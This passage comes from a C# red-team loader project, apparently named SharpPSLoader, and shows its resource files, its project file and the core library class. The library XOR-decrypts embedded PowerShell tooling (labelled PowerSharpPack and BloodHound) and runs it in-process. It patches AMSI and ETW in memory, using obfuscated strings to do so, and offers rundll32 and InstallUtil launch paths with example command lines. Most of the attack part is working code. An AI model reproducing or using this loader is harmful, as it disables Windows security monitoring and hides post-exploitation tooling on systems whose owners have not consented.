15 |     /// <summary>
16 |     ///   A strongly-typed resource class, for looking up localized strings, etc.
17 |     /// </summary>
18 |     // This class was auto-generated by the StronglyTypedResourceBuilder
19 |     // class via a tool like ResGen or Visual Studio.
20 |     // To add or remove a member, edit your .ResX file then rerun ResGen
21 |     // with the /str option, or rebuild your VS project.
22 |     [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
23 |     [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 |     [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 |     public class Resources {
26 |         
27 |         private static global::System.Resources.ResourceManager resourceMan;
28 |         
29 |         private static global::System.Globalization.CultureInfo resourceCulture;
30 |         
31 |         [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 |         internal Resources() {
33 |         }
34 |         
35 |         /// <summary>
36 |         ///   Returns the cached ResourceManager instance used by this class.
37 |         /// </summary>
38 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 |         public static global::System.Resources.ResourceManager ResourceManager {
40 |             get {
41 |                 if (object.ReferenceEquals(resourceMan, null)) {
42 |                     global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SharpPSLoaderConsole.Properties.Resources", typeof(Resources).Assembly);
43 |                     resourceMan = temp;
44 |                 }
45 |                 return resourceMan;
46 |             }
47 |         }
48 |         
49 |         /// <summary>
50 |         ///   Overrides the current thread's CurrentUICulture property for all
51 |         ///   resource lookups using this strongly typed resource class.
52 |         /// </summary>
53 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 |         public static global::System.Globalization.CultureInfo Culture {
55 |             get {
56 |                 return resourceCulture;
57 |             }
58 |             set {
59 |                 resourceCulture = value;
60 |             }
61 |         }
62 |         
63 |         /// <summary>
64 |         ///   Looks up a localized resource of type System.Byte[].
65 |         /// </summary>
66 |         public static byte[] arpPac_ps1 {
67 |             get {
68 |                 object obj = ResourceManager.GetObject("arpPac_ps1", resourceCulture);
69 |                 return ((byte[])(obj));
70 |             }
71 |         }
72 |         
73 |         /// <summary>
74 |         ///   Looks up a localized resource of type System.Byte[].
75 |         /// </summary>
76 |         public static byte[] oodhoun_ps1 {
77 |             get {
78 |                 object obj = ResourceManager.GetObject("oodhoun_ps1", resourceCulture);
79 |                 return ((byte[])(obj));
80 |             }
81 |         }
82 |     }
83 | }
84 | 


--------------------------------------------------------------------------------
/SharpPSLoaderConsole/Properties/Resources.resx:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <root>
  3 |   <!-- 
  4 |     Microsoft ResX Schema 
  5 |     
  6 |     Version 2.0
  7 |     
  8 |     The primary goals of this format is to allow a simple XML format 
  9 |     that is mostly human readable. The generation and parsing of the 
 10 |     various data types are done through the TypeConverter classes 
 11 |     associated with the data types.
 12 |     
 13 |     Example:
 14 |     
 15 |     ... ado.net/XML headers & schema ...
 16 |     <resheader name="resmimetype">text/microsoft-resx</resheader>
 17 |     <resheader name="version">2.0</resheader>
 18 |     <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
 19 |     <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
 20 |     <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
 21 |     <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
 22 |     <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
 23 |         <value>[base64 mime encoded serialized .NET Framework object]</value>
 24 |     </data>
 25 |     <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
 26 |         <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
 27 |         <comment>This is a comment</comment>
 28 |     </data>
 29 |                 
 30 |     There are any number of "resheader" rows that contain simple 
 31 |     name/value pairs.
 32 |     
 33 |     Each data row contains a name, and value. The row also contains a 
 34 |     type or mimetype. Type corresponds to a .NET class that support 
 35 |     text/value conversion through the TypeConverter architecture. 
 36 |     Classes that don't support this are serialized and stored with the 
 37 |     mimetype set.
 38 |     
 39 |     The mimetype is used for serialized objects, and tells the 
 40 |     ResXResourceReader how to depersist the object. This is currently not 
 41 |     extensible. For a given mimetype the value must be set accordingly:
 42 |     
 43 |     Note - application/x-microsoft.net.object.binary.base64 is the format 
 44 |     that the ResXResourceWriter will generate, however the reader can 
 45 |     read any of the formats listed below.
 46 |     
 47 |     mimetype: application/x-microsoft.net.object.binary.base64
 48 |     value   : The object must be serialized with 
 49 |             : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
 50 |             : and then encoded with base64 encoding.
 51 |     
 52 |     mimetype: application/x-microsoft.net.object.soap.base64
 53 |     value   : The object must be serialized with 
 54 |             : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
 55 |             : and then encoded with base64 encoding.
 56 | 
 57 |     mimetype: application/x-microsoft.net.object.bytearray.base64
 58 |     value   : The object must be serialized into a byte array 
 59 |             : using a System.ComponentModel.TypeConverter
 60 |             : and then encoded with base64 encoding.
 61 |     -->
 62 |   <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
 63 |     <xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
 64 |     <xsd:element name="root" msdata:IsDataSet="true">
 65 |       <xsd:complexType>
 66 |         <xsd:choice maxOccurs="unbounded">
 67 |           <xsd:element name="metadata">
 68 |             <xsd:complexType>
 69 |               <xsd:sequence>
 70 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" />
 71 |               </xsd:sequence>
 72 |               <xsd:attribute name="name" use="required" type="xsd:string" />
 73 |               <xsd:attribute name="type" type="xsd:string" />
 74 |               <xsd:attribute name="mimetype" type="xsd:string" />
 75 |               <xsd:attribute ref="xml:space" />
 76 |             </xsd:complexType>
 77 |           </xsd:element>
 78 |           <xsd:element name="assembly">
 79 |             <xsd:complexType>
 80 |               <xsd:attribute name="alias" type="xsd:string" />
 81 |               <xsd:attribute name="name" type="xsd:string" />
 82 |             </xsd:complexType>
 83 |           </xsd:element>
 84 |           <xsd:element name="data">
 85 |             <xsd:complexType>
 86 |               <xsd:sequence>
 87 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
 88 |                 <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
 89 |               </xsd:sequence>
 90 |               <xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
 91 |               <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
 92 |               <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
 93 |               <xsd:attribute ref="xml:space" />
 94 |             </xsd:complexType>
 95 |           </xsd:element>
 96 |           <xsd:element name="resheader">
 97 |             <xsd:complexType>
 98 |               <xsd:sequence>
 99 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
100 |               </xsd:sequence>
101 |               <xsd:attribute name="name" type="xsd:string" use="required" />
102 |             </xsd:complexType>
103 |           </xsd:element>
104 |         </xsd:choice>
105 |       </xsd:complexType>
106 |     </xsd:element>
107 |   </xsd:schema>
108 |   <resheader name="resmimetype">
109 |     <value>text/microsoft-resx</value>
110 |   </resheader>
111 |   <resheader name="version">
112 |     <value>2.0</value>
113 |   </resheader>
114 |   <resheader name="reader">
115 |     <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
116 |   </resheader>
117 |   <resheader name="writer">
118 |     <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
119 |   </resheader>
120 |   <assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
121 |   <data name="arpPac_ps1" type="System.Resources.ResXFileRef, System.Windows.Forms">
122 |     <value>..\Resources\arpPac.ps1.xor;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
123 |   </data>
124 |   <data name="oodhoun_ps1" type="System.Resources.ResXFileRef, System.Windows.Forms">
125 |     <value>..\Resources\oodhoun.ps1.xor;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
126 |   </data>
127 | </root>


--------------------------------------------------------------------------------
/SharpPSLoaderConsole/SharpPSLoaderConsole.csproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
  4 |   <PropertyGroup>
  5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
  6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
  7 |     <ProjectGuid>{4EA75F8D-F287-47E4-B698-931D90A3A85C}</ProjectGuid>
  8 |     <OutputType>Exe</OutputType>
  9 |     <RootNamespace>SharpPSLoaderConsole</RootNamespace>
 10 |     <AssemblyName>SharpPSLoaderConsole</AssemblyName>
 11 |     <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
 12 |     <FileAlignment>512</FileAlignment>
 13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
 14 |     <Deterministic>true</Deterministic>
 15 |   </PropertyGroup>
 16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
 17 |     <DebugSymbols>true</DebugSymbols>
 18 |     <DebugType>full</DebugType>
 19 |     <Optimize>false</Optimize>
 20 |     <OutputPath>bin\Debug\</OutputPath>
 21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
 22 |     <ErrorReport>prompt</ErrorReport>
 23 |     <WarningLevel>4</WarningLevel>
 24 |   </PropertyGroup>
 25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
 26 |     <PlatformTarget>AnyCPU</PlatformTarget>
 27 |     <DebugType>pdbonly</DebugType>
 28 |     <Optimize>true</Optimize>
 29 |     <OutputPath>bin\Release\</OutputPath>
 30 |     <DefineConstants>TRACE</DefineConstants>
 31 |     <ErrorReport>prompt</ErrorReport>
 32 |     <WarningLevel>4</WarningLevel>
 33 |   </PropertyGroup>
 34 |   <PropertyGroup>
 35 |     <DllExportIdent>A4BE2183-64C2-4C6B-A450-D39734FC16DD</DllExportIdent>
 36 |     <DllExportMetaLibName>DllExport.dll</DllExportMetaLibName>
 37 |     <DllExportNamespace>SharpPSLoaderLibrary</DllExportNamespace>
 38 |     <DllExportDDNSCecil>true</DllExportDDNSCecil>
 39 |     <DllExportSkipOnAnyCpu>false</DllExportSkipOnAnyCpu>
 40 |     <PlatformTarget>AnyCPU</PlatformTarget>
 41 |     <DllExportOrdinalsBase>1</DllExportOrdinalsBase>
 42 |     <DllExportGenExpLib>false</DllExportGenExpLib>
 43 |     <DllExportOurILAsm>false</DllExportOurILAsm>
 44 |     <DllExportSysObjRebase>false</DllExportSysObjRebase>
 45 |     <DllExportLeaveIntermediateFiles>false</DllExportLeaveIntermediateFiles>
 46 |     <DllExportTimeout>30000</DllExportTimeout>
 47 |     <DllExportPeCheck>2</DllExportPeCheck>
 48 |     <DllExportPatches>0</DllExportPatches>
 49 |     <DllExportPreProcType>0</DllExportPreProcType>
 50 |     <DllExportPostProcType>0</DllExportPostProcType>
 51 |   </PropertyGroup>
 52 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
 53 |     <DebugSymbols>true</DebugSymbols>
 54 |     <OutputPath>bin\x64\Debug\</OutputPath>
 55 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
 56 |     <DebugType>full</DebugType>
 57 |     <PlatformTarget>x64</PlatformTarget>
 58 |     <LangVersion>7.3</LangVersion>
 59 |     <ErrorReport>prompt</ErrorReport>
 60 |     <Prefer32Bit>true</Prefer32Bit>
 61 |   </PropertyGroup>
 62 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
 63 |     <OutputPath>bin\x64\Release\</OutputPath>
 64 |     <DefineConstants>TRACE</DefineConstants>
 65 |     <Optimize>true</Optimize>
 66 |     <DebugType>pdbonly</DebugType>
 67 |     <PlatformTarget>x64</PlatformTarget>
 68 |     <LangVersion>7.3</LangVersion>
 69 |     <ErrorReport>prompt</ErrorReport>
 70 |     <Prefer32Bit>true</Prefer32Bit>
 71 |   </PropertyGroup>
 72 |   <ItemGroup>
 73 |     <Reference Include="System" />
 74 |     <Reference Include="System.Configuration.Install" />
 75 |     <Reference Include="System.Core" />
 76 |     <Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
 77 |       <SpecificVersion>False</SpecificVersion>
 78 |       <HintPath>..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
 79 |     </Reference>
 80 |     <Reference Include="System.Xml.Linq" />
 81 |     <Reference Include="System.Data.DataSetExtensions" />
 82 |     <Reference Include="Microsoft.CSharp" />
 83 |     <Reference Include="System.Data" />
 84 |     <Reference Include="System.Net.Http" />
 85 |     <Reference Include="System.Xml" />
 86 |   </ItemGroup>
 87 |   <ItemGroup>
 88 |     <Compile Include="Program.cs" />
 89 |     <Compile Include="Properties\AssemblyInfo.cs" />
 90 |     <Compile Include="Properties\Resources.Designer.cs">
 91 |       <AutoGen>True</AutoGen>
 92 |       <DesignTime>True</DesignTime>
 93 |       <DependentUpon>Resources.resx</DependentUpon>
 94 |     </Compile>
 95 |   </ItemGroup>
 96 |   <ItemGroup>
 97 |     <None Include="App.config" />
 98 |     <None Include="Resources\arpPac.ps1.xor" />
 99 |     <None Include="Resources\oodhoun.ps1.xor" />
100 |   </ItemGroup>
101 |   <ItemGroup>
102 |     <EmbeddedResource Include="Properties\Resources.resx">
103 |       <Generator>PublicResXFileCodeGenerator</Generator>
104 |       <SubType>Designer</SubType>
105 |       <LastGenOutput>Resources.Designer.cs</LastGenOutput>
106 |     </EmbeddedResource>
107 |   </ItemGroup>
108 |   <ItemGroup>
109 |     <PackageReference Include="DllExport">
110 |       <Version>1.7.4</Version>
111 |       <Visible>false</Visible>
112 |       <Wz>1</Wz>
113 |     </PackageReference>
114 |   </ItemGroup>
115 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
116 |   <ImportGroup Label=".NET DllExport">
117 |     <Import Project="$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets" Condition="Exists($([MSBuild]::Escape('$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets')))" Label="8337224c9ad9e356" />
118 |   </ImportGroup>
119 |   <Target Name="DllExportRestorePkg" BeforeTargets="PrepareForBuild">
120 |     <Error Condition="!Exists('$(SolutionDir)DllExport.bat')" Text="DllExport.bat is not found. Path: '$(SolutionDir)' - https://github.com/3F/DllExport" />
121 |     <Exec Condition="('$(DllExportModImported)' != 'true' Or !Exists('$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets')) And Exists('$(SolutionDir)DllExport.bat')" Command=".\DllExport.bat  -action Restore" WorkingDirectory="$(SolutionDir)" />
122 |     <MSBuild Condition="'$(DllExportModImported)' != 'true'" Projects="$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets" Targets="DllExportMetaXBaseTarget" Properties="TargetFramework=$(TargetFramework)">
123 |       <Output TaskParameter="TargetOutputs" PropertyName="DllExportMetaXBase" />
124 |     </MSBuild>
125 |     <ItemGroup>
126 |       <Reference Include="DllExport, PublicKeyToken=8337224c9ad9e356">
127 |         <HintPath>$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\gcache\$(DllExportMetaXBase)\$(DllExportNamespace)\$(DllExportMetaLibName)</HintPath>
128 |         <Private>False</Private>
129 |         <SpecificVersion>False</SpecificVersion>
130 |       </Reference>
131 |     </ItemGroup>
132 |   </Target>
133 |   <Target Name="DllExportRPkgDynamicImport" BeforeTargets="PostBuildEvent" DependsOnTargets="GetFrameworkPaths" Condition="'$(DllExportModImported)' != 'true' And '$(DllExportRPkgDyn)' != 'false'">
134 |     <MSBuild BuildInParallel="true" UseResultsCache="true" Projects="$(MSBuildProjectFullPath)" Properties="DllExportRPkgDyn=true" Targets="Build" />
135 |   </Target>
136 | </Project>


--------------------------------------------------------------------------------
/SharpPSLoaderLibrary/Class1.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.Linq;
  4 | using System.Text;
  5 | using System.Management.Automation;
  6 | using System.Management.Automation.Runspaces;
  7 | using System.Collections;
  8 | using System.Runtime.InteropServices;
  9 | using System.Reflection;
 10 | 
 11 | /*
 12 |  * Add reference to c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0\<~>\system.management.automation.dll  and configuration.install 
 13 |  *      
 14 |  * Adding Resources 
 15 |  *  - Project > Properties > Add Resources > Access Modifier = Public 
 16 |  *  - And simply access it like... var thingy = Properties.Resources.<resource-name>
 17 |  *      - Returns "type" by default. ex) .txt file ==> string, byte file ==> byte[] 
 18 |  *  - Thought about adding powershell scripts, decided to just yoink powersharppack and call it a day 
 19 |  * 
 20 |  * */
 21 | 
 22 | namespace SharpPSLoaderLibrary
 23 | {
 24 |     public class SharpPSLoaderLibrary
 25 |     {
 26 | 
 27 |         public Dictionary<string, byte[]> resourceDict = ParseResources();
 28 | 
 29 |         /// <summary>
 30 |         /// XOR Decrypt powershell byte array payload with key and return raw powershell payload
 31 |         /// </summary>
 32 |         /// <param name="payload"></param>
 33 |         /// <param name="singleByteKey">Default xor decrypt key is 0x6f = 111</param>
 34 |         /// <returns>resultStr, powershell string</returns>
 35 |         public static string DecryptAndStringReturn(byte[] payload, byte singleByteKey = 0x6f)
 36 |         {
 37 |             byte[] result = new byte[payload.Length];
 38 |             for (int i = 0; i < payload.Length; i++)
 39 |             {
 40 |                 result[i] = (byte)(payload[i] ^ singleByteKey);
 41 |             }
 42 | 
 43 |             var resultStr = Encoding.UTF8.GetString(result);
 44 | 
 45 |             return resultStr;
 46 |         }
 47 | 
 48 |         // https://stackoverflow.com/questions/1310812/how-can-i-find-all-the-members-of-a-properties-resources-in-c-sharp
 49 |         /// <summary>
 50 |         /// Parse resources from assembly and create a dictionary of <string, byte[]> where string = Name, byte[] = Encrypted powershell payload.
 51 |         /// </summary>
 52 |         /// <returns>resourceDict</returns>
 53 |         public static Dictionary<string, byte[]> ParseResources()
 54 |         {
 55 |             Dictionary<string, byte[]> resourceDict = new Dictionary<string, byte[]>();
 56 | 
 57 |             // https://stackoverflow.com/questions/1310812/how-can-i-find-all-the-members-of-a-properties-resources-in-c-sharp
 58 |             List<string> resourceNames = new List<string>();
 59 |             foreach (PropertyInfo property in (typeof(Properties.Resources).GetProperties
 60 |                 (BindingFlags.Static | BindingFlags.Public | BindingFlags.NonPublic)).Skip(2))  // Skip ResourceManager and Culture - hardcoding ftw 
 61 |             {
 62 |                 resourceDict[property.Name.ToLower()] = (byte[])(property.GetValue(null, null));
 63 |             }
 64 |             return resourceDict;
 65 |         }
 66 | 
 67 |         /// <summary>
 68 |         /// Decrypt powershell payload from the resources dictioanry and return the raw powershell payload 
 69 |         /// </summary>
 70 |         /// <param name="resourceDict"></param>
 71 |         /// <param name="payload"></param>
 72 |         /// <returns>decPowershell</returns>
 73 |         public string DecryptedPSFromRsrcDict(Dictionary<string, byte[]> resourceDict, string payload)
 74 |         {
 75 |             // 1. Return encrypted powershell payload byte array 
 76 |             byte[] encPayload = new byte[] { };
 77 | 
 78 | #if DEBUG
 79 |             Console.WriteLine("[+] payload = {0}", payload);
 80 | #endif
 81 | 
 82 |             // 1 = PowerSharpPack 2. Bloodhound 3. Powerview 
 83 |             switch (payload.Trim().ToLower())
 84 |             {
 85 |                 case "1":
 86 |                     encPayload = resourceDict.Where(a => a.Key.Contains("arppac")).Select(a => a.Value).First();
 87 |                     break;
 88 |                 case "2":
 89 |                     encPayload = resourceDict.Where(a => a.Key.Contains("oodhoun")).Select(a => a.Value).First();
 90 |                     break;
 91 |                 default:
 92 |                     break;
 93 |             }
 94 | 
 95 |             // 2. Decrypt the byte array, and return the raw powershell payload 
 96 |             string decPowershell = DecryptAndStringReturn(encPayload);
 97 | 
 98 |             return decPowershell;
 99 |         }
100 | 
101 |         public static string ParseFunctionName(string payload)
102 |         {
103 |             var lines = payload.Split(new string[] { Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries);
104 |             string functionName = "";
105 |             foreach (var line in lines)
106 |             {
107 |                 //Console.WriteLine(line);
108 |                 if (line.ToLower().Contains("function"))
109 |                 {
110 |                     functionName = line.Split(' ')[1].Trim().Replace("{", "");
111 |                     break;
112 |                 }
113 |             }
114 | 
115 |             return functionName;
116 |         }
117 | 
118 |         public static bool is64Bit
119 |         {
120 |             get
121 |             {
122 |                 return IntPtr.Size == 8;
123 |             }
124 |         }
125 | 
126 |         // Return required bytes for patching 
127 |         public static byte[] GetPatchBytes(string function)
128 |         {
129 |             byte[] patch;
130 |             List<byte> patchList = new List<byte>();
131 |             if (function.ToLower() == "bypasstw")
132 |             {
133 |                 if (is64Bit)
134 |                 {
135 |                     patch = new byte[2];
136 |                     patch[0] = 0xc3;
137 |                     patch[1] = 0x00;
138 |                 }
139 |                 else
140 |                 {
141 |                     patch = new byte[3];
142 |                     patch[0] = 0xc2;
143 |                     patch[1] = 0x14;
144 |                     patch[2] = 0x00;
145 |                 }
146 | 
147 |                 // Returning for bypassEtw 
148 |                 return patch;
149 |             }
150 | 
151 |             else if (function.ToLower() == "bypasssi")
152 |             {
153 | 
154 |                 if (is64Bit)
155 |                 {
156 |                     patchList = new List<byte>();
157 |                     patchList.Add(0xB8);
158 |                     patchList.Add(0x90);
159 |                     patchList.Add(0x57);
160 |                     patchList.Add(0x00);
161 |                     patchList.Add(0x07);
162 |                     patchList.Add(0x90);
163 |                     patchList.Add(0x80);
164 |                     patchList.Add(0xC3);
165 |                     patchList.RemoveAll(b => b == 0x90);
166 |                 }
167 |                 else
168 |                 {
169 |                     patchList = new List<byte>();
170 |                     patchList.Add(0xB8);
171 |                     patchList.Add(0x90);
172 |                     patchList.Add(0x57);
173 |                     patchList.Add(0x00);
174 |                     patchList.Add(0x07);
175 |                     patchList.Add(0x90);
176 |                     patchList.Add(0x80);
177 |                     patchList.Add(0xC2);
178 |                     patchList.Add(0x90);
179 |                     patchList.Add(0x18);
180 |                     patchList.Add(0x00);
181 |                     patchList.RemoveAll(b => b == 0x90);
182 |                 }
183 | 
184 |                 var patchArr = patchList.ToArray();
185 |                 return patchArr;
186 |             }
187 | 
188 |             else
189 |             {
190 |                 throw new ArgumentException("[-] Incorrect function name argument");
191 |             }
192 |         }
193 | 
194 |         public void bypassTW()
195 |         {
196 |             string susLibraryZ = "nZtZdZlZlZ.dZlZlZ";
197 |             string magicFunctionZ = "EZZtZwZEZvZeZnZtZWZrZiZtZe";
198 |             string susLibrary = susLibraryZ.Replace("Z", "");
199 |             string magicFunction = magicFunctionZ.Replace("Z", "");
200 | 
201 |             IntPtr ntdllAddr = LoadLibrary(susLibrary);
202 |             IntPtr etwWriteEventAddr = GetProcAddress(ntdllAddr, magicFunction);
203 | 
204 |             byte[] magicVoodoo = GetPatchBytes("bypasstw");
205 | 
206 |             // out uint oldProtect is a nice trick, never knew that 
207 |             VirtualProtect(etwWriteEventAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect);
208 |             Marshal.Copy(magicVoodoo, 0, etwWriteEventAddr, magicVoodoo.Length);
209 |             VirtualProtect(etwWriteEventAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect);
210 | 
211 | #if DEBUG
212 |             Console.WriteLine("[+] Disabled ETW Tracing");
213 | #endif
214 |         }
215 | 
216 |         public void bypassSI()
217 |         {
218 |             string amsidllZ = "Za" + "mZsZi" + "Z.ZdZ" + "Zll";
219 |             string amsiScanBufferZ = "AZm" + "siSZZc" + "aZnZB" + "uZfZfZer";
220 | 
221 |             string amsiDll = amsidllZ.Replace("Z", "");
222 |             string amsiScanBuffer = amsiScanBufferZ.Replace("Z", "");
223 | 
224 |             IntPtr amsidllAddr = LoadLibrary(amsiDll);
225 |             IntPtr amsiScanBufferAddr = GetProcAddress(amsidllAddr, amsiScanBuffer);
226 | 
227 |             byte[] magicVoodoo = GetPatchBytes("bypasssi");
228 | 
229 |             VirtualProtect(amsiScanBufferAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect);
230 |             Marshal.Copy(magicVoodoo, 0, amsiScanBufferAddr, magicVoodoo.Length);
231 |             VirtualProtect(amsiScanBufferAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect);
232 | 
233 | #if DEBUG
234 |             Console.WriteLine("[+] Disabled AMSI");
235 | #endif
236 |         }
237 | 
238 |         public void RunPowershell(string payload, string argument = "")
239 |         {
240 |             argument = argument.TrimStart();
241 | #if DEBUG
242 |             Console.WriteLine("[+] User argument = {0}", argument);
243 | #endif
244 |             string cmd = payload;
245 |             cmd += ";";
246 |             cmd += argument;
247 | 
248 | #if DEBUG
249 |             // Uncomment to see raw powershell payload string in console 
250 |             //Console.WriteLine(cmd);
251 | #endif
252 | 
253 |             Runspace rs = RunspaceFactory.CreateRunspace();
254 |             rs.Open();
255 | 
256 |             PowerShell ps = PowerShell.Create();
257 |             ps.Runspace = rs;
258 |             ps.AddScript(cmd);
259 |             var results = ps.Invoke();
260 | 
261 |             // Result is 0, powershell errored out. 
262 |             if (results.Count == 0)
263 |             {
264 |                 Console.WriteLine("[-] Powershell returned error");
265 |                 return;
266 |             }
267 | 
268 |             // Result is not 0, at least something returned. Write all output and yeet out. 
269 |             foreach (var obj in results)
270 |             {
271 |                 if (obj != null)
272 |                 {
273 |                     Console.WriteLine(obj.BaseObject.ToString());
274 |                 }
275 |             }
276 | 
277 |             rs.Close();
278 |         }
279 | 
280 |         // Empty constructor for now 
281 |         public SharpPSLoaderLibrary()
282 |         {
283 | 
284 |         }
285 | 
286 |         // -------------------------------------------------------------------------------------------------
287 |         // Exported execute function for rundll32.exe
288 |         // - https://blog.xpnsec.com/rundll32-your-dotnet/
289 |         // - https://3xpl01tc0d3r.blogspot.com/2019/11/managed-dll-exports-and-run-via-rundll32.html
290 |         // -------------------------------------------------------------------------------------------------
291 |         [DllExport("runLibrary")]
292 |         public static void runLibrary()
293 |         {
294 | 
295 |             // Attach console & Parse commandline through getCommandLineA() pinvoke here 
296 |             AttachConsole(0x0ffffffff);
297 |             // Get all commandline argument (ex. rundll32.exe,Execute 1 PowerSharpPack -seatbelt -command '-group=user') 
298 |             string cmdVal = GetCommandLineA();
299 |             string fName = "runLibrary";
300 | 
301 |             // Get starting index of the function name ("Execute")
302 |             int funcIndex = cmdVal.IndexOf(fName);
303 | 
304 |             // Actual argument index = function name index + function name length 
305 |             int argStartIndex = funcIndex + fName.Length;
306 | 
307 |             // Final arguments are every string after argStartIndex 
308 |             string finalArgs = cmdVal.Substring(argStartIndex).TrimStart();
309 |             string[] args = finalArgs.Split(' ');
310 | 
311 |             // Execute starts 
312 |             SharpPSLoaderLibrary psLoader = new SharpPSLoaderLibrary();
313 |             psLoader.bypassSI();
314 |             psLoader.bypassTW();
315 | 
316 |             // Parse argument 
317 |             string powershellPayload = "";
318 |             if (args[0] != null)
319 |             {
320 |                 powershellPayload = psLoader.DecryptedPSFromRsrcDict(psLoader.resourceDict, args[0]);
321 |             }
322 | 
323 |             string argument = String.Join(" ", args.Skip(1));
324 |             psLoader.RunPowershell(powershellPayload, argument);
325 |         }
326 | 
327 | 
328 |         [DllImport("kernel32")]
329 |         static extern IntPtr GetProcAddress(
330 |         IntPtr hModule,
331 |         string procName);
332 | 
333 |         [DllImport("kernel32")]
334 |         static extern IntPtr LoadLibrary(
335 |         string name);
336 | 
337 |         [DllImport("kernel32")]
338 |         static extern bool VirtualProtect(
339 |         IntPtr lpAddress,
340 |         UIntPtr dwSize,
341 |         uint flNewProtect,
342 |         out uint lpflOldProtect);
343 | 
344 | 
345 |         [DllImport("kernel32.dll", SetLastError = true)]
346 |         static extern bool AttachConsole(uint dwProcessId);
347 | 
348 |         [DllImport("kernel32.dll", SetLastError = true)]
349 |         static extern string GetCommandLineA();
350 |     }
351 | 
352 |     // -------------------------------------------------------------------------------------------------
353 |     // Uninstall function to execute SharpPSLoader through InstallUtil.exe 
354 |     // -------------------------------------------------------------------------------------------------
355 | 
356 |     // C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /p="1 PowerSharpPack -seatbelt -Command '-group=user'" /U .\SharpPSLoader.exe
357 | 
358 |     [System.ComponentModel.RunInstaller(true)]
359 |     public class Sample : System.Configuration.Install.Installer
360 |     {
361 |         public override void Uninstall(IDictionary savedState)
362 |         {
363 |             SharpPSLoaderLibrary psLoader = new SharpPSLoaderLibrary();
364 | 
